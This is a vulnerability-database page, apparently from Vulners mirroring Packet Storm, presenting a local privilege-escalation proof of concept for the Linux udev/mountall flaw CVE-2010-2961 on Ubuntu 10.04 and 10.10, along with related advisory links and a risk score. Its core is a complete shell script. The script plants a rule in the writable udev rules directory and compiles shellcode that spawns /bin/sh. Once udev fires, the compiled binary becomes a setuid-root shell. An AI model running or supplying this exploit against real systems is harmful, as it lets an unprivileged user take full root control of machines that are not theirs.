Lucene search
K

Linux udev Local Proof Of Concept

🗓️ 21 Sep 2010 00:00:00Reported by fuzzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Local privilege escalation vulnerability in Linux ude

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-2961
21 Sep 201000:00
circl
CVE
CVE-2010-2961
14 Sep 201018:00
cve
Cvelist
CVE-2010-2961
14 Sep 201018:00
cvelist
EUVD
EUVD-2010-2965
7 Oct 202500:30
euvd
NVD
CVE-2010-2961
14 Sep 201019:00
nvd
OpenVAS
Ubuntu: Security Advisory (USN-985-1)
10 Sep 201000:00
openvas
OpenVAS
Ubuntu Update for mountall vulnerability USN-985-1
10 Sep 201000:00
openvas
Prion
Design/Logic Flaw
14 Sep 201019:00
prion
RedhatCVE
CVE-2010-2961
22 May 202505:50
redhatcve
securityvulns
[USN-985-1] mountall vulnerability
9 Sep 201000:00
securityvulns
Rows per page
`#!/bin/sh  
# by fuzz. For Anux inc. #  
# ubuntu 10.04 , 10.10  
if [ -z "$1" ]  
then  
echo "usage: $0 <UDEV KERNEL EVENT>"  
echo "see here http://www.reactivated.net/writing_udev_rules.html"  
exit  
fi  
cat > usn985-exploit.sh << EOF  
#!/bin/sh  
chown root:root $PWD/usn985-sc  
chmod +s $PWD/usn985-sc  
EOF  
cat > usn985-sc.c << EOF  
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"  
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";  
main(){int *r;*((int *)&r+2)=(int)s;}  
EOF  
gcc usn985-sc.c -o usn985-sc  
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules  
chmod +x usn985-exploit.sh  
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"  
echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Sep 2010 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.00073
29